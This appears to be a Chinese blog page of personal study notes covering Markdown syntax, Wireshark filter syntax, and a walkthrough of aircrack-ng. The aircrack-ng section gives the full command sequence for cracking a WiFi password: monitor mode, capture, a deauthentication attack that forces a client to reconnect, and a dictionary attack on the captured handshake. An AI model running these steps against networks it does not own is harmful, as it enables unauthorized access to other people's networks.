Browse Category: 其他

MarkDown 学习笔记

语法

标题

标题是每篇文章都需要也是最常用的格式,在 Markdown 中,如果一段文字被定义为标题,只要在这段文字前加 # 号即可

列表

在文字前加上 – 或 * 即可变为无序列表,有序列表则直接在文字前加 1. 1. 1. 符号要和文字之间加上一个字符的空格

  1. 无序列表
  2. 有序列表

图片和链接

链接

本人github地址

图片

![默认名字](图片地址)

粗体与斜体

粗体 两个**包起来

斜体 一个*包起来

代码

表格

这是示例

Tables Are Cool
col 3 is right-aligned $1600
col 2 is centered $12
zebra stripes are neat $1

分隔线

*** 有如下分隔效果


语法手册

工具

aircrack-ng 使用

安装

aircrack-ng

原理

  1. 网卡监听
  2. 扫描周围wifi
  3. 选择监听目标wifi
  4. 发起攻击,模拟wifi路由器单播,向目标用户发出断开连接请求
  5. 目标用户断开连接并自动重连,获取4次握手包
  6. 4次握手包含有加密密码
  7. 暴力破解,穷举字典

aircrack-ng使用

  1. 查看本机无线网卡

ifconfig

  1. 激活网卡到monitor模式

sudo airmon-ng start wlan0

  1. 探测无线网络

sudo airodump-ng wlan0

  1. 监听频道,抓取被选定路由器数据包

sudo airodump-ng --ivs -w linuxcpp -c 6 wlan0mon

捕获到的内容写入 linuxcpp-0x.ivs 文件

  1. 发起deauth包,使客户端重连路由器

sudo aireplay-ng -0 1 -a 路由器MAC -h 客户端MAC wlan0mon

  1. 穷举字典

aircrack-ng -w dict linuxcpp-01.ivs

  • dict 字典文件
  • linuxcpp-01.ivs 握手包数据文件

编写字典

按特点生成字典

参考

  • wifi密码破解-Linux工具篇 虚竹 ITCAST

wireshark 使用笔记

抓包流程

  1. 选网卡
  2. 设置抓包过滤器
  3. 设置显示过滤器
  4. 网络封包数据分析

wiresharkstep.jpg

设置抓包过滤

语法

protocol $ direction $ hosts $ value $logical operations $ other expression

示例

ip src host 192.168.1.100

tcp dst port 8080

protocol

可能值: ether, fddi, ip, arp ,rarp, tcp and udp

direction

可能值: src, dst, src and dst, src or dst

Host(s)

可能值: net, port, host, portrange

逻辑运算 logical operations

可能值: not, and, or

设置显示过滤

语法

protocol.string1.string2 $ comparison operation $ value $ logical operation $ other expression

示例

ip.src == 192.168.1.100

tcp.port == 80

http.request.method == post

网络封包分析

分析网络数据包

  • ether
  • IP
  • TCP
  • HTTP

参考

  • [linux-sys.zh]
  • wifi密码破解-Linux工具篇 虚竹 ITCAST